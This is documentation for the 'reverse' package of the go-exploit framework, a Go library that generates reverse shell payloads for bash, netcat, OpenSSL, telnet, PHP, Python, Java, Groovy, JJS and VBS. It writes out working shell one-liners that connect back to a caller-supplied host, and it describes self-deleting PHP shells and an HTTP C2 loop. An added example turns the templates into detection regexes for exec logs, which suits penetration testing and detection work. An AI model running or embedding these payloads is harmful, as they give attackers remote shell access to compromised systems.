Documentation
Overview
Reverse shell and command payloads.
The reverse package contains all the code for reverse shell payloads. Each of these payload types can be used either in the raw string format for manipulation or via the specific payload type provided by the project.
This package is designed to be abstract enough to allow several styles of composition, with the understanding that payloads are almost always string- or byte-oriented. With this in mind, a payload may be produced either through a constructed type or through a direct format-string call.
For example, here are the three ways to create a netcat reverse shell payload that result in the same payload:

	reverse.Netcat.Default("127.0.0.1", 1337)
	reverse.Netcat.Mknod("127.0.0.1", 1337)
	fmt.Sprintf(reverse.NetcatMknod, "127.0.0.1", 1337)
Each of the defined payload types should utilize a Default reverse shell constant that corresponds to the most common case.
Index
- Constants
- Variables
- type BashPayload
- type Default
- type GJScriptPayload
- type GroovyPayload
- type JJSScriptPayload
- type JavaPayload
- type NetcatPayload
- type OpenSSLPayload
- type PHPPayload
- func (php *PHPPayload) Default(lhost string, lport int) string
- func (php *PHPPayload) LinuxInteractive(lhost string, lport int) string
- func (php *PHPPayload) Unflattened(lhost string, lport int, encrypted bool) string
- func (php *PHPPayload) UnflattenedSelfDelete(lhost string, lport int, encrypted bool) string
- type PythonPayload
- type Reverse
- type TelnetPayload
- type VBSHTTPPayload
Constants

	const (
		BashDefault        = BashTCPRedirection
		BashTCPRedirection = `bash -c 'bash &> /dev/tcp/%s/%d <&1'`
		BashHTTPShellLoop  = `` /* 141-byte string literal not displayed */
	)

	const (
		NetcatDefault = NetcatGaping
		NetcatGaping  = `nc %s %d -e /bin/sh`
		NetcatMknod   = `cd /tmp/; mknod %s p;cat %s|/bin/sh -i 2>&1|nc %s %d >%s; rm %s;`
	)

	const (
		OpenSSLDefault = OpenSSLMknod
		OpenSSLMknod   = `cd /tmp; mknod %s p; sh -i < %s 2>&1 | openssl s_client -quiet -connect %s:%d > %s; rm %s;`
		OpenSSLMkfifo  = `cd /tmp; mkfifo %s; sh -i < %s 2>&1 | openssl s_client -quiet -connect %s:%d > %s; rm %s;`
	)

	const (
		TelnetDefault       = TelnetMknod
		TelnetMknod         = `cd /tmp; mknod %s p; sh -i < %s 2>&1 | telnet %s:%d > %s; rm %s;`
		TelnetMknodNoColon  = `cd /tmp; mknod %s p; sh -i < %s 2>&1 | telnet %s %d > %s; rm %s;`
		TelnetMkfifo        = `cd /tmp; mkfifo %s; telnet %s:%d 0<%s | sh 1>%s; rm %s;`
		TelnetMkfifoNoColon = `cd /tmp; mkfifo %s; telnet %s %d 0<%s | sh 1>%s; rm %s;`
	)
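Because every constant above is a plain fmt.Sprintf template, the same templates that generate a payload also describe exactly what the payload looks like on the wire or in a process-execution log. The following program, an added example that is not part of the go-exploit package, turns a template into a regular expression (each %s becomes a non-space token for a host or pipe name, each %d a port) and runs it over a few constructed command lines of the kind an EDR or auditd exec record would carry. The template strings are copied from the Constants section; the payloadTemplates map, TemplateToRegexp, MatchPayloads and the sample lines are all assumptions of this example, not part of the package:

```go
package main

import (
	"fmt"
	"regexp"
	"sort"
	"strings"
)

// Copies of the Sprintf templates listed in this package's Constants section
// (the real package exposes them as reverse.BashTCPRedirection and so on;
// they are inlined here so the example runs without the module).
var payloadTemplates = map[string]string{
	"BashTCPRedirection": `bash -c 'bash &> /dev/tcp/%s/%d <&1'`,
	"NetcatGaping":       `nc %s %d -e /bin/sh`,
	"NetcatMknod":        `cd /tmp/; mknod %s p;cat %s|/bin/sh -i 2>&1|nc %s %d >%s; rm %s;`,
	"OpenSSLMkfifo":      `cd /tmp; mkfifo %s; sh -i < %s 2>&1 | openssl s_client -quiet -connect %s:%d > %s; rm %s;`,
}

// TemplateToRegexp converts a Sprintf payload template into a regular
// expression: literal text is quoted, every %s becomes a non-space token
// (host or pipe name) and every %d becomes a port number.
func TemplateToRegexp(tmpl string) (*regexp.Regexp, error) {
	var sb strings.Builder
	for i := 0; i < len(tmpl); i++ {
		if tmpl[i] == '%' && i+1 < len(tmpl) {
			switch tmpl[i+1] {
			case 's':
				sb.WriteString(`\S+`)
				i++
				continue
			case 'd':
				sb.WriteString(`\d{1,5}`)
				i++
				continue
			}
		}
		sb.WriteString(regexp.QuoteMeta(tmpl[i : i+1]))
	}
	return regexp.Compile(sb.String())
}

// compiledTemplates is built once from payloadTemplates at start-up.
var compiledTemplates = func() map[string]*regexp.Regexp {
	out := make(map[string]*regexp.Regexp, len(payloadTemplates))
	for name, tmpl := range payloadTemplates {
		re, err := TemplateToRegexp(tmpl)
		if err != nil {
			panic(fmt.Sprintf("template %s: %v", name, err))
		}
		out[name] = re
	}
	return out
}()

// MatchPayloads returns the sorted names of every template whose shape is
// found inside a recorded command line; an empty slice means no match.
func MatchPayloads(cmdline string) []string {
	hits := []string{}
	for name, re := range compiledTemplates {
		if re.MatchString(cmdline) {
			hits = append(hits, name)
		}
	}
	sort.Strings(hits)
	return hits
}

// Constructed sample process command lines (hypothetical, documentation-range
// addresses) in the form an exec-logging sensor would record them.
var sampleCommandLines = []string{
	`bash -c 'bash &> /dev/tcp/192.0.2.10/4444 <&1'`,
	`nc 192.0.2.10 4444 -e /bin/sh`,
	`cd /tmp/; mknod f p;cat f|/bin/sh -i 2>&1|nc 192.0.2.10 4444 >f; rm f;`,
	`ls -la /tmp`,
}

func main() {
	for _, line := range sampleCommandLines {
		fmt.Printf("%-75s -> %v\n", line, MatchPayloads(line))
	}
}
```

The generated expressions are only as good as the templates: a one-character change to the command line breaks the match, so they are most useful as regression test vectors for a detection pipeline, and as a seed for broader rules, rather than as the rule itself. A more robust signal is behavioural (an interactive shell whose standard streams are a network socket, or a named pipe created in /tmp and immediately consumed by a network client), which the templates above help document but do not detect. Note also that the mknod and mkfifo templates take a pipe name for each additional %s, so those format strings need more arguments than the two shown in the Overview.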
Variables

	var (
		//go:embed groovy/classic.groovy
		GroovyClassic string
		GroovyDefault = GroovyClassic
	)

	var (
		//go:embed java/process_builder.java
		JavaProcessBuilderInteractive string
		JavaDefault = JavaProcessBuilderInteractive
	)

	var (
		//go:embed jjs/reverse_shell.jjs
		JJSShell string
		//go:embed jjs/reverse_shell_ssl.jjs
		JJSShellSSL string
	)

	var (
		PHPDefault          = PHPLinuxInteractive
		PHPLinuxInteractive = `<?php $sock=fsockopen("%s",%d);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes); ?>`
		//go:embed php/unflattened.php
		PHPUnflattened string
		//go:embed php/unflattened_self_delete.php
		PHPUnflattenedSelfDelete string
	)

	var (
		PythonDefault = Python27
		//go:embed python/reverse27.py
		Python27 string
		//go:embed python/reverse27_secure.py
		Python27Secure string
		//go:embed python/reverse3_12_secure.py
		Python3_12Secure string
	)

	var (
		// Example: makes the Bash payloads accessible via `reverse.Bash`.
		Bash    = &BashPayload{}
		GJScript = &GJScriptPayload{}
		JJS     = &JJSScriptPayload{}
		Java    = &JavaPayload{}
		Netcat  = &NetcatPayload{}
		OpenSSL = &OpenSSLPayload{}
		PHP     = &PHPPayload{}
		Python  = &PythonPayload{}
		Telnet  = &TelnetPayload{}
		Groovy  = &GroovyPayload{}
		VBSHTTP = &VBSHTTPPayload{}
	)

	var GJScriptDefault = GJScriptGLibSpawn

	var GJScriptGLibSpawn string

	var VBSShell string
Functions
This section is empty.
Types

type BashPayload

	type BashPayload struct{}

Defines the default Bash struct and all associated payload functions.

func (*BashPayload) Default

	func (bash *BashPayload) Default(lhost string, lport int) string

The default payload type for reverse bash uses the /dev/tcp pseudo-device redirects that are built into bash.

Example

	package main

	import (
		"fmt"

		"github.com/vulncheck-oss/go-exploit/payload/reverse"
	)

	func main() {
		fmt.Println(reverse.Bash.Default("127.0.0.1", 1337))
	}

Output:

	bash -c 'bash &> /dev/tcp/127.0.0.1/1337 <&1'

func (*BashPayload) HTTPShellLoop (added in v1.46.0)

An infinite-loop shell script that keeps running until the HTTP server stops responding. This is the shell-script counterpart of the c2.HTTPShellServer C2 logic.

func (*BashPayload) TCPRedirection

	func (bash *BashPayload) TCPRedirection(lhost string, lport int) string

Uses the bash `/dev/tcp/` networking pseudo-device to create a reverse bash shell.
type GJScriptPayload

	type GJScriptPayload struct{}

Defines the default GJScript struct and all associated payload functions.
type GroovyPayload (added in v1.16.0)

	type GroovyPayload struct{}

Defines the default Groovy struct and all associated payload functions.

func (*GroovyPayload) Default (added in v1.16.0)

	func (groovy *GroovyPayload) Default(lhost string, lport int) string

func (*GroovyPayload) GroovyClassic (added in v1.16.0)

	func (groovy *GroovyPayload) GroovyClassic(lhost string, lport int) string

A short payload that creates a reverse shell using /bin/sh -i.
type JJSScriptPayload

	type JJSScriptPayload struct{}

Defines the default JJS struct and all associated payload functions.

func (*JJSScriptPayload) Default

	func (jjs *JJSScriptPayload) Default(lhost string, lport int, ssl bool) string

Generates a script that can be used to create a reverse shell via jjs (Java's Nashorn JavaScript engine). This is an adapted version of Frohoff's original gist. Additionally, the logic for disabling TLS validation was adapted from a blog post by Callan Howell-Pavia.

The script autodetects whether the platform is Windows and provides a 'cmd.exe' shell; otherwise bash is used.

https://redthunder.blog/2018/04/09/disabling-hostname-validation-in-nashorn-javascript/
https://gist.github.com/frohoff/8e7c2bf3737032a25051
type JavaPayload

	type JavaPayload struct{}

Defines the default Java struct and all associated payload functions.

func (*JavaPayload) Default

	func (java *JavaPayload) Default(lhost string, lport int) string

Defaults to the UnflattenedJava payload.

func (*JavaPayload) UnflattenedJava

	func (java *JavaPayload) UnflattenedJava(lhost string, lport int) string

An unflattened Java reverse shell. This is the "classic" Java reverse shell that spawns the shell using ProcessBuilder and then redirects its input and output to and from the socket.
type NetcatPayload

	type NetcatPayload struct{}

Defines the default Netcat struct and all associated payload functions.
type OpenSSLPayload

	type OpenSSLPayload struct{}

Defines the default OpenSSL struct and all associated payload functions.

func (*OpenSSLPayload) Default

	func (openssl *OpenSSLPayload) Default(lhost string, lport int) string
type PHPPayload

	type PHPPayload struct{}

Defines the default PHP struct and all associated payload functions.

func (*PHPPayload) LinuxInteractive

	func (php *PHPPayload) LinuxInteractive(lhost string, lport int) string

A short payload that creates a reverse shell using /bin/sh -i.

func (*PHPPayload) Unflattened

	func (php *PHPPayload) Unflattened(lhost string, lport int, encrypted bool) string

Creates a reverse shell using PHP. The payload autodetects the operating system and selects cmd.exe or /bin/sh accordingly. The caller also specifies whether the reverse shell should be encrypted:

	reverse.PHP.Unflattened("10.9.49.80", 1270, true)

func (*PHPPayload) UnflattenedSelfDelete (added in v1.33.0)

	func (php *PHPPayload) UnflattenedSelfDelete(lhost string, lport int, encrypted bool) string

Creates a reverse shell using PHP, the same as Unflattened, but attempts to self-delete and registers destructors that remove the file from disk when the command exits.
type PythonPayload

	type PythonPayload struct{}

Defines the default Python struct and all associated payload functions.

func (*PythonPayload) Python27

	func (py *PythonPayload) Python27(lhost string, lport int) string

An unflattened reverse shell that works on Python 2.7 and 3+, on Windows and Linux.

func (*PythonPayload) SecurePython27

	func (py *PythonPayload) SecurePython27(lhost string, lport int) string

An unflattened reverse shell that uses an SSL socket; works on Python 2.7 and 3+, on Windows and Linux.

func (*PythonPayload) SecurePython312 (added in v1.38.0)

	func (py *PythonPayload) SecurePython312(lhost string, lport int) string

An unflattened reverse shell that uses an SSL socket created from a Python 3.12 SSL context; works on Windows and Linux. This payload is required for SSL reverse shells on Python 3.12, because Python moved to requiring an SSL context instead of a simple socket wrap.
type Reverse

	type Reverse interface {
		Default
	}

Defines the Default function to be implemented for each type of payload.
type TelnetPayload

	type TelnetPayload struct{}

Defines the default Telnet struct and all associated payload functions.

func (*TelnetPayload) Default

	func (telnet *TelnetPayload) Default(lhost string, lport int, colon bool) string
type VBSHTTPPayload (added in v1.42.0)

	type VBSHTTPPayload struct{}

Defines the default VBSHTTP struct and all associated payload functions.

func (*VBSHTTPPayload) Default (added in v1.42.0)

Generates a script that can be used to create a reverse shell via VBS (it can be run with cscript). Original source: https://raw.githubusercontent.com/cym13/vbs-reverse-shell/refs/heads/master/reverse_shell.vbs